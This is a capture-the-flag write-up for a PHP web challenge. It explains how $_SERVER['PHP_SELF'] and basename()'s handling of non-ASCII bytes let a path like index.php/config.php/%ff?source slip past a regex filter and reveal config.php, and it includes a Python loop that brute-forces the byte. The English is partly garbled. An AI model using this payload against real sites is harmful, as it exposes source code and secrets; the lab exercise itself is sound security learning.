Article Directory
Pre-knowledge
Some new functions and variables learned
New variable attribute-PHP_SELF
$_SERVER['PHP_SELF']
Indicates the location address of the current php file relative to the root directory of the website, related to the document root.
Below is a screenshot of the local test, which ishttp://.$_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF']
New php function -basename
basename()
The function will return the file name part of the path.
If the path is /index.php/config.php, the
browser's analysis result is index.php
and basename will return config.php,
even if it is followed by extra characters, it will also return the file name part.
basename broken with non-ASCII-chars
Below is an English description from [Official Website](https://bugs.php.net/bug.php?id=62119)
With the default locale setting “C”, basename() drops non-ASCII-chars
at the beginning of a filename.
var_dump(basename("xffconfig.php")); // => config.php
var_dump(basename("config.php/xff")); // => config.php
Simply put, basename()
there is a problem with the function, it will remove the non-ASCII value at the beginning of the file name
WP part
This question is actually very simple. After knowing the above function, the most important part after the code audit is the regular filtering /config.php/*$/i
. We only need to bypass it. The reason is very simple.
It is the matching tail,
so we only need to construct xxxxx.node3.buuoj.cn/index.php/config.php/%ff?source
a
On the one hand , it bypasses the regular matching. On the other hand, it is satisfied isset
, so as to get it. config.php
Of course, you can also use the script to try which characters are not filtered out.
import requests
import re
for i in range(0,255):
url ='xxxxx.node3.buuoj.cn/index.php/config.php/{}?source'.format(chr(i))
print(url)
r = requests.get(url)
flag = re.findall("flag\{.*?\}", r.text)
if flag:
print(flag)
break